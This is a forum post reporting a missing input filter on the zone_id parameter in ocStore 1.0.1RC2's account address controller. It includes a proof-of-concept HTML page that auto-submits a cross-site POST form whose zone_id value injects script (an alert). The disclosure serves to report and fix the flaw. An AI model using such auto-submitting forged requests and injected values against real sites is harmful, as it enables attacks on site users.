Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Фильтрация zone_id


LTRay

Recommended Posts

В ./catalog/controller/account/address.php нету фильтрации/приведения типа к int

Не xss так как post запрос, но всё равно как то не хорошо

Срабатывание при открытии

ocStore 1.0.1RC2

Пример формы

<body onload="document.main.submit()">
<form name="main" method="post" action="http://localhost/index.php?route=account/address/update&address_id=1">
<input type="hidden" name="zone_id" value="123');alert('a" />
</form>
</body>
Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.